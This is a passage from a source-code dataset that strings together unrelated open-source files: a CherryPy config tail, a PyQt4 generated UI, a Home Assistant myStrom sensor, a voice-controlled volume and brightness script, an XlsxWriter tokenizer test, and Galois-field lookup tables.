'tools.staticdir.dir': data_dir+"/downloads"},
'/images':{
'tools.staticdir.on': True,
'tools.staticdir.dir': data_dir+"/images"}
}
root = Hello()
root.gear = gear.Gear()
cherrypy.server.socket_port = 8080
cherrypy.server.socket_host = '127.0.0.1'
if 'OPENSHIFT_REPO_DIR' in os.environ:
    # 表示在 OpenShift 執行
application = cherrypy.Application(root, config=application_conf)
else:
# 表示在近端執行
cherrypy.quickstart(root, config=application_conf)
#@-leo
|
gpl-3.0
| -6,298,804,478,695,336,000 | 34.762295 | 184 | 0.582627 | false |
raulperula/python_tutorials
|
tutorial-pyqt/src/example12.py
|
1
|
5052
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'example12.ui'
#
# Created: Sun Jan 18 18:25:33 2015
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(534, 613)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.mdiArea = QtGui.QMdiArea(self.centralwidget)
self.mdiArea.setGeometry(QtCore.QRect(20, 20, 441, 421))
self.mdiArea.setObjectName(_fromUtf8("mdiArea"))
self.subwindow = QtGui.QWidget()
self.subwindow.setObjectName(_fromUtf8("subwindow"))
self.label = QtGui.QLabel(self.subwindow)
self.label.setGeometry(QtCore.QRect(50, 30, 66, 17))
self.label.setObjectName(_fromUtf8("label"))
self.subwindow_2 = QtGui.QWidget()
self.subwindow_2.setObjectName(_fromUtf8("subwindow_2"))
self.label_2 = QtGui.QLabel(self.subwindow_2)
self.label_2.setGeometry(QtCore.QRect(80, 30, 66, 17))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.pushButton_next = QtGui.QPushButton(self.centralwidget)
self.pushButton_next.setGeometry(QtCore.QRect(20, 460, 98, 27))
self.pushButton_next.setObjectName(_fromUtf8("pushButton_next"))
self.pushButton__back = QtGui.QPushButton(self.centralwidget)
self.pushButton__back.setGeometry(QtCore.QRect(190, 460, 98, 27))
self.pushButton__back.setObjectName(_fromUtf8("pushButton__back"))
self.pushButton__close = QtGui.QPushButton(self.centralwidget)
self.pushButton__close.setGeometry(QtCore.QRect(350, 460, 98, 27))
self.pushButton__close.setObjectName(_fromUtf8("pushButton__close"))
self.pushButton_cascade = QtGui.QPushButton(self.centralwidget)
self.pushButton_cascade.setGeometry(QtCore.QRect(20, 500, 98, 27))
self.pushButton_cascade.setObjectName(_fromUtf8("pushButton_cascade"))
self.pushButton_tail = QtGui.QPushButton(self.centralwidget)
self.pushButton_tail.setGeometry(QtCore.QRect(140, 500, 98, 27))
self.pushButton_tail.setObjectName(_fromUtf8("pushButton_tail"))
self.pushButton_subwindow = QtGui.QPushButton(self.centralwidget)
self.pushButton_subwindow.setGeometry(QtCore.QRect(260, 500, 121, 27))
self.pushButton_subwindow.setObjectName(_fromUtf8("pushButton_subwindow"))
self.pushButton_tab = QtGui.QPushButton(self.centralwidget)
self.pushButton_tab.setGeometry(QtCore.QRect(400, 500, 98, 27))
self.pushButton_tab.setObjectName(_fromUtf8("pushButton_tab"))
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 534, 25))
self.menubar.setObjectName(_fromUtf8("menubar"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "MainWindow", None, QtGui.QApplication.UnicodeUTF8))
self.subwindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "Subwindow", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("MainWindow", "TextLabel", None, QtGui.QApplication.UnicodeUTF8))
self.subwindow_2.setWindowTitle(QtGui.QApplication.translate("MainWindow", "Subwindow", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("MainWindow", "TextLabel", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton_next.setText(QtGui.QApplication.translate("MainWindow", "Next", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton__back.setText(QtGui.QApplication.translate("MainWindow", "Back", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton__close.setText(QtGui.QApplication.translate("MainWindow", "Close All", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton_cascade.setText(QtGui.QApplication.translate("MainWindow", "Cascade", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton_tail.setText(QtGui.QApplication.translate("MainWindow", "Tail", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton_subwindow.setText(QtGui.QApplication.translate("MainWindow", "View Subwindow", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton_tab.setText(QtGui.QApplication.translate("MainWindow", "View Tab", None, QtGui.QApplication.UnicodeUTF8))
|
gpl-3.0
| 842,008,327,386,751,700 | 60.609756 | 141 | 0.722288 | false |
fbradyirl/home-assistant
|
homeassistant/components/mystrom/binary_sensor.py
|
1
|
2888
|
"""Support for the myStrom buttons."""
import logging
from homeassistant.components.binary_sensor import DOMAIN, BinarySensorDevice
from homeassistant.components.http import HomeAssistantView
from homeassistant.const import HTTP_UNPROCESSABLE_ENTITY
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up myStrom Binary Sensor."""
hass.http.register_view(MyStromView(async_add_entities))
return True
class MyStromView(HomeAssistantView):
"""View to handle requests from myStrom buttons."""
url = "/api/mystrom"
name = "api:mystrom"
supported_actions = ["single", "double", "long", "touch"]
def __init__(self, add_entities):
"""Initialize the myStrom URL endpoint."""
self.buttons = {}
self.add_entities = add_entities
async def get(self, request):
"""Handle the GET request received from a myStrom button."""
res = await self._handle(request.app["hass"], request.query)
return res
async def _handle(self, hass, data):
"""Handle requests to the myStrom endpoint."""
button_action = next(
(parameter for parameter in data if parameter in self.supported_actions),
None,
)
if button_action is None:
_LOGGER.error("Received unidentified message from myStrom button: %s", data)
return (
"Received unidentified message: {}".format(data),
HTTP_UNPROCESSABLE_ENTITY,
)
button_id = data[button_action]
entity_id = "{}.{}_{}".format(DOMAIN, button_id, button_action)
if entity_id not in self.buttons:
_LOGGER.info(
"New myStrom button/action detected: %s/%s", button_id, button_action
)
self.buttons[entity_id] = MyStromBinarySensor(
"{}_{}".format(button_id, button_action)
)
self.add_entities([self.buttons[entity_id]])
else:
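            # Known button/action: each new report toggles the sensor state.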
new_state = self.buttons[entity_id].state == "off"
self.buttons[entity_id].async_on_update(new_state)
class MyStromBinarySensor(BinarySensorDevice):
"""Representation of a myStrom button."""
def __init__(self, button_id):
"""Initialize the myStrom Binary sensor."""
self._button_id = button_id
self._state = None
@property
def name(self):
"""Return the name of the sensor."""
return self._button_id
@property
def should_poll(self):
"""No polling needed."""
return False
@property
def is_on(self):
"""Return true if the binary sensor is on."""
return self._state
def async_on_update(self, value):
"""Receive an update."""
self._state = value
self.async_schedule_update_ha_state()
|
apache-2.0
| 4,502,797,213,050,914,000 | 31.088889 | 88 | 0.611842 | false |
vidursatija/voiceai
|
loadhardware.py
|
1
|
3338
|
import os
from subprocess import Popen, PIPE
from typeclassifier import TypeClassifier
class HardwareControl:
def __init__(self):
self.classifier = TypeClassifier("fastText/voiceai-hardware.bin", "fastText/fasttext")
self.backlightDir = "/sys/class/backlight/acpi_video0/"
self.maxBrightnessDir = self.backlightDir+'max_brightness'
self.brightnessDir = self.backlightDir+'brightness'
self.brightCmd = 'tee'
f = open(self.maxBrightnessDir, 'r')
self.max_brightness = int(f.readline())
f.close()
f = open(self.brightnessDir, 'r')
self.brightness = int(f.readline())
f.close()
self.volumeCmd = "amixer set 'Master' "
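        # Assumes an ACPI backlight exposed at /sys/class/backlight/acpi_video0/
        # (plain-integer `brightness` / `max_brightness` files) and an ALSA
        # mixer control named 'Master' driven through `amixer`.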
def textFilter(self, tagged):
keep_words = ['xVB', 'xRP', 'xNN']
change_tags = ['xCD']
# change tags -> keep tags -> return array of tuple
filtered_tags = []
for tup in tagged:
for k_w in keep_words:
if tup[1] == k_w:
filtered_tags.append(tup)
break
for c_t in change_tags:
if tup[1] == c_t:
filtered_tags.append((tup[1], tup[1]))
break
return filtered_tags
def functionFilter(self, tagged, pure_entities):
keep_words = ['xVB', 'xRP', 'xNN', 'xIN']
change_tags = ['xCD']
NUM = []
# change tags -> keep tags -> return array of tuple
filtered_tags = []
for tup in tagged:
for k_w in keep_words:
if tup[1] == k_w:
filtered_tags.append(tup)
break
if tup[1] == 'xCD':
NUM.append(int(tup[0]))
for c_t in change_tags:
if tup[1] == c_t:
filtered_tags.append((tup[1], tup[1]))
break
text = [tup[0] for tup in filtered_tags]
f_type, prob = self.classifier.classifyText(" ".join(text))
msg = ""
percent = 15
if len(NUM) > 0:
percent = int(NUM[0])
if f_type == 1:
return "".join([msg, self.increaseVolume(percent)])
if f_type == 2:
return "".join([msg, self.increaseVolume(percent, False)])
if f_type == 3:
return "".join([msg, self.increaseBrightness(percent)])
if f_type == 4:
return "".join([msg, self.increaseBrightness(percent, False)])
if f_type == 5:
return "".join([msg, self.setVolume(percent)])
if f_type == 6:
return "".join([msg, self.setBrightness(percent)])
return "I'm sorry, I didn't get that"
def setVolume(self, percent):
os.system("".join([self.volumeCmd, str(percent), '%']))
return "Volume set"
def increaseVolume(self, percent, positive=True):
sign = '+'
if positive == False:
sign = '-'
os.system("".join([self.volumeCmd, str(percent), '%', sign]))
return "Volume increased/decreased"
def setBrightness(self, percent):
if percent > 100:
percent = 100
if percent < 0:
percent = 0
self.brightness = int(percent*self.max_brightness/100)
#sudoService = Popen(['sudo', '-S', 'su'], stdout=PIPE, stderr=PIPE)
#o = sudoService.communicate(input='ironpatriot')
os.system(" ".join(["echo", str(self.brightness), ">>", self.brightnessDir]))
#brightnessService = Popen(["echo", " ".join(["2", ">>", self.brightnessDir])], stdout=PIPE, stderr=PIPE)
#out = brightnessService.communicate(input='2')
#sudoService = Popen(['exit'])
return "Brightness set"
def increaseBrightness(self, percent, positive=True):
cPercent = self.brightness*100/self.max_brightness
if positive:
cPercent = cPercent + percent
else:
cPercent = cPercent - percent
return self.setBrightness(cPercent)
|
apache-2.0
| -5,138,109,972,561,166,000 | 27.05042 | 107 | 0.64979 | false |
ivmech/iviny-scope
|
lib/xlsxwriter/test/worksheet/test_extract_filter_tokens.py
|
1
|
2758
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ...worksheet import Worksheet
class TestExtractFilterTokens(unittest.TestCase):
"""
Test the Worksheet _extract_filter_tokens() method.
"""
def setUp(self):
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_extract_filter_tokens(self):
"""Test the _extract_filter_tokens() method"""
testcases = [
[
None,
[],
],
[
'',
[],
],
[
'0 < 2001',
['0', '<', '2001'],
],
[
'x < 2000',
['x', '<', '2000'],
],
[
'x > 2000',
['x', '>', '2000'],
],
[
'x == 2000',
['x', '==', '2000'],
],
[
'x > 2000 and x < 5000',
['x', '>', '2000', 'and', 'x', '<', '5000'],
],
[
'x = "goo"',
['x', '=', 'goo'],
],
[
'x = moo',
['x', '=', 'moo'],
],
[
'x = "foo baz"',
['x', '=', 'foo baz'],
],
[
'x = "moo "" bar"',
['x', '=', 'moo " bar'],
],
[
'x = "foo bar" or x = "bar foo"',
['x', '=', 'foo bar', 'or', 'x', '=', 'bar foo'],
],
[
'x = "foo "" bar" or x = "bar "" foo"',
['x', '=', 'foo " bar', 'or', 'x', '=', 'bar " foo'],
],
[
'x = """"""""',
['x', '=', '"""'],
],
[
'x = Blanks',
['x', '=', 'Blanks'],
],
[
'x = NonBlanks',
['x', '=', 'NonBlanks'],
],
[
'top 10 %',
['top', '10', '%'],
],
[
'top 10 items',
['top', '10', 'items'],
],
]
for testcase in testcases:
expression = testcase[0]
exp = testcase[1]
got = self.worksheet._extract_filter_tokens(expression)
self.assertEqual(got, exp)
if __name__ == '__main__':
unittest.main()
|
gpl-3.0
| -3,116,406,206,606,398,500 | 20.379845 | 79 | 0.273387 | false |
xSAVIKx/SHUP-algorithm
|
algorithm/util.py
|
1
|
16299
|
__author__ = 'Iurii Sergiichuk <iurii.sergiichuk@gmail.com>'
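# gal1..gal14 are precomputed multiplication tables over GF(2^8) with the AES
# reduction polynomial x^8 + x^4 + x^3 + x + 1: galN[b] equals N*b in the field.
# galNI = (gal2, gal3, gal1, gal1) matches a forward MixColumns-style row and
# galI = (gal14, gal11, gal13, gal9) the corresponding inverse row.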
gal1 = tuple(range(256))
gal2 = (
0x00, 0x02, 0x04, 0x06, 0x08, 0x0a, 0x0c, 0x0e, 0x10, 0x12, 0x14, 0x16, 0x18, 0x1a, 0x1c, 0x1e,
0x20, 0x22, 0x24, 0x26, 0x28, 0x2a, 0x2c, 0x2e, 0x30, 0x32, 0x34, 0x36, 0x38, 0x3a, 0x3c, 0x3e,
0x40, 0x42, 0x44, 0x46, 0x48, 0x4a, 0x4c, 0x4e, 0x50, 0x52, 0x54, 0x56, 0x58, 0x5a, 0x5c, 0x5e,
0x60, 0x62, 0x64, 0x66, 0x68, 0x6a, 0x6c, 0x6e, 0x70, 0x72, 0x74, 0x76, 0x78, 0x7a, 0x7c, 0x7e,
0x80, 0x82, 0x84, 0x86, 0x88, 0x8a, 0x8c, 0x8e, 0x90, 0x92, 0x94, 0x96, 0x98, 0x9a, 0x9c, 0x9e,
0xa0, 0xa2, 0xa4, 0xa6, 0xa8, 0xaa, 0xac, 0xae, 0xb0, 0xb2, 0xb4, 0xb6, 0xb8, 0xba, 0xbc, 0xbe,
0xc0, 0xc2, 0xc4, 0xc6, 0xc8, 0xca, 0xcc, 0xce, 0xd0, 0xd2, 0xd4, 0xd6, 0xd8, 0xda, 0xdc, 0xde,
0xe0, 0xe2, 0xe4, 0xe6, 0xe8, 0xea, 0xec, 0xee, 0xf0, 0xf2, 0xf4, 0xf6, 0xf8, 0xfa, 0xfc, 0xfe,
0x1b, 0x19, 0x1f, 0x1d, 0x13, 0x11, 0x17, 0x15, 0x0b, 0x09, 0x0f, 0x0d, 0x03, 0x01, 0x07, 0x05,
0x3b, 0x39, 0x3f, 0x3d, 0x33, 0x31, 0x37, 0x35, 0x2b, 0x29, 0x2f, 0x2d, 0x23, 0x21, 0x27, 0x25,
0x5b, 0x59, 0x5f, 0x5d, 0x53, 0x51, 0x57, 0x55, 0x4b, 0x49, 0x4f, 0x4d, 0x43, 0x41, 0x47, 0x45,
0x7b, 0x79, 0x7f, 0x7d, 0x73, 0x71, 0x77, 0x75, 0x6b, 0x69, 0x6f, 0x6d, 0x63, 0x61, 0x67, 0x65,
0x9b, 0x99, 0x9f, 0x9d, 0x93, 0x91, 0x97, 0x95, 0x8b, 0x89, 0x8f, 0x8d, 0x83, 0x81, 0x87, 0x85,
0xbb, 0xb9, 0xbf, 0xbd, 0xb3, 0xb1, 0xb7, 0xb5, 0xab, 0xa9, 0xaf, 0xad, 0xa3, 0xa1, 0xa7, 0xa5,
0xdb, 0xd9, 0xdf, 0xdd, 0xd3, 0xd1, 0xd7, 0xd5, 0xcb, 0xc9, 0xcf, 0xcd, 0xc3, 0xc1, 0xc7, 0xc5,
0xfb, 0xf9, 0xff, 0xfd, 0xf3, 0xf1, 0xf7, 0xf5, 0xeb, 0xe9, 0xef, 0xed, 0xe3, 0xe1, 0xe7, 0xe5)
gal3 = (
0x00, 0x03, 0x06, 0x05, 0x0c, 0x0f, 0x0a, 0x09, 0x18, 0x1b, 0x1e, 0x1d, 0x14, 0x17, 0x12, 0x11,
0x30, 0x33, 0x36, 0x35, 0x3c, 0x3f, 0x3a, 0x39, 0x28, 0x2b, 0x2e, 0x2d, 0x24, 0x27, 0x22, 0x21,
0x60, 0x63, 0x66, 0x65, 0x6c, 0x6f, 0x6a, 0x69, 0x78, 0x7b, 0x7e, 0x7d, 0x74, 0x77, 0x72, 0x71,
0x50, 0x53, 0x56, 0x55, 0x5c, 0x5f, 0x5a, 0x59, 0x48, 0x4b, 0x4e, 0x4d, 0x44, 0x47, 0x42, 0x41,
0xc0, 0xc3, 0xc6, 0xc5, 0xcc, 0xcf, 0xca, 0xc9, 0xd8, 0xdb, 0xde, 0xdd, 0xd4, 0xd7, 0xd2, 0xd1,
0xf0, 0xf3, 0xf6, 0xf5, 0xfc, 0xff, 0xfa, 0xf9, 0xe8, 0xeb, 0xee, 0xed, 0xe4, 0xe7, 0xe2, 0xe1,
0xa0, 0xa3, 0xa6, 0xa5, 0xac, 0xaf, 0xaa, 0xa9, 0xb8, 0xbb, 0xbe, 0xbd, 0xb4, 0xb7, 0xb2, 0xb1,
0x90, 0x93, 0x96, 0x95, 0x9c, 0x9f, 0x9a, 0x99, 0x88, 0x8b, 0x8e, 0x8d, 0x84, 0x87, 0x82, 0x81,
0x9b, 0x98, 0x9d, 0x9e, 0x97, 0x94, 0x91, 0x92, 0x83, 0x80, 0x85, 0x86, 0x8f, 0x8c, 0x89, 0x8a,
0xab, 0xa8, 0xad, 0xae, 0xa7, 0xa4, 0xa1, 0xa2, 0xb3, 0xb0, 0xb5, 0xb6, 0xbf, 0xbc, 0xb9, 0xba,
0xfb, 0xf8, 0xfd, 0xfe, 0xf7, 0xf4, 0xf1, 0xf2, 0xe3, 0xe0, 0xe5, 0xe6, 0xef, 0xec, 0xe9, 0xea,
0xcb, 0xc8, 0xcd, 0xce, 0xc7, 0xc4, 0xc1, 0xc2, 0xd3, 0xd0, 0xd5, 0xd6, 0xdf, 0xdc, 0xd9, 0xda,
0x5b, 0x58, 0x5d, 0x5e, 0x57, 0x54, 0x51, 0x52, 0x43, 0x40, 0x45, 0x46, 0x4f, 0x4c, 0x49, 0x4a,
0x6b, 0x68, 0x6d, 0x6e, 0x67, 0x64, 0x61, 0x62, 0x73, 0x70, 0x75, 0x76, 0x7f, 0x7c, 0x79, 0x7a,
0x3b, 0x38, 0x3d, 0x3e, 0x37, 0x34, 0x31, 0x32, 0x23, 0x20, 0x25, 0x26, 0x2f, 0x2c, 0x29, 0x2a,
0x0b, 0x08, 0x0d, 0x0e, 0x07, 0x04, 0x01, 0x02, 0x13, 0x10, 0x15, 0x16, 0x1f, 0x1c, 0x19, 0x1a)
gal9 = (
0x00, 0x09, 0x12, 0x1b, 0x24, 0x2d, 0x36, 0x3f, 0x48, 0x41, 0x5a, 0x53, 0x6c, 0x65, 0x7e, 0x77,
0x90, 0x99, 0x82, 0x8b, 0xb4, 0xbd, 0xa6, 0xaf, 0xd8, 0xd1, 0xca, 0xc3, 0xfc, 0xf5, 0xee, 0xe7,
0x3b, 0x32, 0x29, 0x20, 0x1f, 0x16, 0x0d, 0x04, 0x73, 0x7a, 0x61, 0x68, 0x57, 0x5e, 0x45, 0x4c,
0xab, 0xa2, 0xb9, 0xb0, 0x8f, 0x86, 0x9d, 0x94, 0xe3, 0xea, 0xf1, 0xf8, 0xc7, 0xce, 0xd5, 0xdc,
0x76, 0x7f, 0x64, 0x6d, 0x52, 0x5b, 0x40, 0x49, 0x3e, 0x37, 0x2c, 0x25, 0x1a, 0x13, 0x08, 0x01,
0xe6, 0xef, 0xf4, 0xfd, 0xc2, 0xcb, 0xd0, 0xd9, 0xae, 0xa7, 0xbc, 0xb5, 0x8a, 0x83, 0x98, 0x91,
0x4d, 0x44, 0x5f, 0x56, 0x69, 0x60, 0x7b, 0x72, 0x05, 0x0c, 0x17, 0x1e, 0x21, 0x28, 0x33, 0x3a,
0xdd, 0xd4, 0xcf, 0xc6, 0xf9, 0xf0, 0xeb, 0xe2, 0x95, 0x9c, 0x87, 0x8e, 0xb1, 0xb8, 0xa3, 0xaa,
0xec, 0xe5, 0xfe, 0xf7, 0xc8, 0xc1, 0xda, 0xd3, 0xa4, 0xad, 0xb6, 0xbf, 0x80, 0x89, 0x92, 0x9b,
0x7c, 0x75, 0x6e, 0x67, 0x58, 0x51, 0x4a, 0x43, 0x34, 0x3d, 0x26, 0x2f, 0x10, 0x19, 0x02, 0x0b,
0xd7, 0xde, 0xc5, 0xcc, 0xf3, 0xfa, 0xe1, 0xe8, 0x9f, 0x96, 0x8d, 0x84, 0xbb, 0xb2, 0xa9, 0xa0,
0x47, 0x4e, 0x55, 0x5c, 0x63, 0x6a, 0x71, 0x78, 0x0f, 0x06, 0x1d, 0x14, 0x2b, 0x22, 0x39, 0x30,
0x9a, 0x93, 0x88, 0x81, 0xbe, 0xb7, 0xac, 0xa5, 0xd2, 0xdb, 0xc0, 0xc9, 0xf6, 0xff, 0xe4, 0xed,
0x0a, 0x03, 0x18, 0x11, 0x2e, 0x27, 0x3c, 0x35, 0x42, 0x4b, 0x50, 0x59, 0x66, 0x6f, 0x74, 0x7d,
0xa1, 0xa8, 0xb3, 0xba, 0x85, 0x8c, 0x97, 0x9e, 0xe9, 0xe0, 0xfb, 0xf2, 0xcd, 0xc4, 0xdf, 0xd6,
0x31, 0x38, 0x23, 0x2a, 0x15, 0x1c, 0x07, 0x0e, 0x79, 0x70, 0x6b, 0x62, 0x5d, 0x54, 0x4f, 0x46)
gal11 = (
0x00, 0x0b, 0x16, 0x1d, 0x2c, 0x27, 0x3a, 0x31, 0x58, 0x53, 0x4e, 0x45, 0x74, 0x7f, 0x62, 0x69,
0xb0, 0xbb, 0xa6, 0xad, 0x9c, 0x97, 0x8a, 0x81, 0xe8, 0xe3, 0xfe, 0xf5, 0xc4, 0xcf, 0xd2, 0xd9,
0x7b, 0x70, 0x6d, 0x66, 0x57, 0x5c, 0x41, 0x4a, 0x23, 0x28, 0x35, 0x3e, 0x0f, 0x04, 0x19, 0x12,
0xcb, 0xc0, 0xdd, 0xd6, 0xe7, 0xec, 0xf1, 0xfa, 0x93, 0x98, 0x85, 0x8e, 0xbf, 0xb4, 0xa9, 0xa2,
0xf6, 0xfd, 0xe0, 0xeb, 0xda, 0xd1, 0xcc, 0xc7, 0xae, 0xa5, 0xb8, 0xb3, 0x82, 0x89, 0x94, 0x9f,
0x46, 0x4d, 0x50, 0x5b, 0x6a, 0x61, 0x7c, 0x77, 0x1e, 0x15, 0x08, 0x03, 0x32, 0x39, 0x24, 0x2f,
0x8d, 0x86, 0x9b, 0x90, 0xa1, 0xaa, 0xb7, 0xbc, 0xd5, 0xde, 0xc3, 0xc8, 0xf9, 0xf2, 0xef, 0xe4,
0x3d, 0x36, 0x2b, 0x20, 0x11, 0x1a, 0x07, 0x0c, 0x65, 0x6e, 0x73, 0x78, 0x49, 0x42, 0x5f, 0x54,
0xf7, 0xfc, 0xe1, 0xea, 0xdb, 0xd0, 0xcd, 0xc6, 0xaf, 0xa4, 0xb9, 0xb2, 0x83, 0x88, 0x95, 0x9e,
0x47, 0x4c, 0x51, 0x5a, 0x6b, 0x60, 0x7d, 0x76, 0x1f, 0x14, 0x09, 0x02, 0x33, 0x38, 0x25, 0x2e,
0x8c, 0x87, 0x9a, 0x91, 0xa0, 0xab, 0xb6, 0xbd, 0xd4, 0xdf, 0xc2, 0xc9, 0xf8, 0xf3, 0xee, 0xe5,
0x3c, 0x37, 0x2a, 0x21, 0x10, 0x1b, 0x06, 0x0d, 0x64, 0x6f, 0x72, 0x79, 0x48, 0x43, 0x5e, 0x55,
0x01, 0x0a, 0x17, 0x1c, 0x2d, 0x26, 0x3b, 0x30, 0x59, 0x52, 0x4f, 0x44, 0x75, 0x7e, 0x63, 0x68,
0xb1, 0xba, 0xa7, 0xac, 0x9d, 0x96, 0x8b, 0x80, 0xe9, 0xe2, 0xff, 0xf4, 0xc5, 0xce, 0xd3, 0xd8,
0x7a, 0x71, 0x6c, 0x67, 0x56, 0x5d, 0x40, 0x4b, 0x22, 0x29, 0x34, 0x3f, 0x0e, 0x05, 0x18, 0x13,
0xca, 0xc1, 0xdc, 0xd7, 0xe6, 0xed, 0xf0, 0xfb, 0x92, 0x99, 0x84, 0x8f, 0xbe, 0xb5, 0xa8, 0xa3)
gal13 = (
0x00, 0x0d, 0x1a, 0x17, 0x34, 0x39, 0x2e, 0x23, 0x68, 0x65, 0x72, 0x7f, 0x5c, 0x51, 0x46, 0x4b,
0xd0, 0xdd, 0xca, 0xc7, 0xe4, 0xe9, 0xfe, 0xf3, 0xb8, 0xb5, 0xa2, 0xaf, 0x8c, 0x81, 0x96, 0x9b,
0xbb, 0xb6, 0xa1, 0xac, 0x8f, 0x82, 0x95, 0x98, 0xd3, 0xde, 0xc9, 0xc4, 0xe7, 0xea, 0xfd, 0xf0,
0x6b, 0x66, 0x71, 0x7c, 0x5f, 0x52, 0x45, 0x48, 0x03, 0x0e, 0x19, 0x14, 0x37, 0x3a, 0x2d, 0x20,
0x6d, 0x60, 0x77, 0x7a, 0x59, 0x54, 0x43, 0x4e, 0x05, 0x08, 0x1f, 0x12, 0x31, 0x3c, 0x2b, 0x26,
0xbd, 0xb0, 0xa7, 0xaa, 0x89, 0x84, 0x93, 0x9e, 0xd5, 0xd8, 0xcf, 0xc2, 0xe1, 0xec, 0xfb, 0xf6,
0xd6, 0xdb, 0xcc, 0xc1, 0xe2, 0xef, 0xf8, 0xf5, 0xbe, 0xb3, 0xa4, 0xa9, 0x8a, 0x87, 0x90, 0x9d,
0x06, 0x0b, 0x1c, 0x11, 0x32, 0x3f, 0x28, 0x25, 0x6e, 0x63, 0x74, 0x79, 0x5a, 0x57, 0x40, 0x4d,
0xda, 0xd7, 0xc0, 0xcd, 0xee, 0xe3, 0xf4, 0xf9, 0xb2, 0xbf, 0xa8, 0xa5, 0x86, 0x8b, 0x9c, 0x91,
0x0a, 0x07, 0x10, 0x1d, 0x3e, 0x33, 0x24, 0x29, 0x62, 0x6f, 0x78, 0x75, 0x56, 0x5b, 0x4c, 0x41,
0x61, 0x6c, 0x7b, 0x76, 0x55, 0x58, 0x4f, 0x42, 0x09, 0x04, 0x13, 0x1e, 0x3d, 0x30, 0x27, 0x2a,
0xb1, 0xbc, 0xab, 0xa6, 0x85, 0x88, 0x9f, 0x92, 0xd9, 0xd4, 0xc3, 0xce, 0xed, 0xe0, 0xf7, 0xfa,
0xb7, 0xba, 0xad, 0xa0, 0x83, 0x8e, 0x99, 0x94, 0xdf, 0xd2, 0xc5, 0xc8, 0xeb, 0xe6, 0xf1, 0xfc,
0x67, 0x6a, 0x7d, 0x70, 0x53, 0x5e, 0x49, 0x44, 0x0f, 0x02, 0x15, 0x18, 0x3b, 0x36, 0x21, 0x2c,
0x0c, 0x01, 0x16, 0x1b, 0x38, 0x35, 0x22, 0x2f, 0x64, 0x69, 0x7e, 0x73, 0x50, 0x5d, 0x4a, 0x47,
0xdc, 0xd1, 0xc6, 0xcb, 0xe8, 0xe5, 0xf2, 0xff, 0xb4, 0xb9, 0xae, 0xa3, 0x80, 0x8d, 0x9a, 0x97)
gal14 = (
0x00, 0x0e, 0x1c, 0x12, 0x38, 0x36, 0x24, 0x2a, 0x70, 0x7e, 0x6c, 0x62, 0x48, 0x46, 0x54, 0x5a,
0xe0, 0xee, 0xfc, 0xf2, 0xd8, 0xd6, 0xc4, 0xca, 0x90, 0x9e, 0x8c, 0x82, 0xa8, 0xa6, 0xb4, 0xba,
0xdb, 0xd5, 0xc7, 0xc9, 0xe3, 0xed, 0xff, 0xf1, 0xab, 0xa5, 0xb7, 0xb9, 0x93, 0x9d, 0x8f, 0x81,
0x3b, 0x35, 0x27, 0x29, 0x03, 0x0d, 0x1f, 0x11, 0x4b, 0x45, 0x57, 0x59, 0x73, 0x7d, 0x6f, 0x61,
0xad, 0xa3, 0xb1, 0xbf, 0x95, 0x9b, 0x89, 0x87, 0xdd, 0xd3, 0xc1, 0xcf, 0xe5, 0xeb, 0xf9, 0xf7,
0x4d, 0x43, 0x51, 0x5f, 0x75, 0x7b, 0x69, 0x67, 0x3d, 0x33, 0x21, 0x2f, 0x05, 0x0b, 0x19, 0x17,
0x76, 0x78, 0x6a, 0x64, 0x4e, 0x40, 0x52, 0x5c, 0x06, 0x08, 0x1a, 0x14, 0x3e, 0x30, 0x22, 0x2c,
0x96, 0x98, 0x8a, 0x84, 0xae, 0xa0, 0xb2, 0xbc, 0xe6, 0xe8, 0xfa, 0xf4, 0xde, 0xd0, 0xc2, 0xcc,
0x41, 0x4f, 0x5d, 0x53, 0x79, 0x77, 0x65, 0x6b, 0x31, 0x3f, 0x2d, 0x23, 0x09, 0x07, 0x15, 0x1b,
0xa1, 0xaf, 0xbd, 0xb3, 0x99, 0x97, 0x85, 0x8b, 0xd1, 0xdf, 0xcd, 0xc3, 0xe9, 0xe7, 0xf5, 0xfb,
0x9a, 0x94, 0x86, 0x88, 0xa2, 0xac, 0xbe, 0xb0, 0xea, 0xe4, 0xf6, 0xf8, 0xd2, 0xdc, 0xce, 0xc0,
0x7a, 0x74, 0x66, 0x68, 0x42, 0x4c, 0x5e, 0x50, 0x0a, 0x04, 0x16, 0x18, 0x32, 0x3c, 0x2e, 0x20,
0xec, 0xe2, 0xf0, 0xfe, 0xd4, 0xda, 0xc8, 0xc6, 0x9c, 0x92, 0x80, 0x8e, 0xa4, 0xaa, 0xb8, 0xb6,
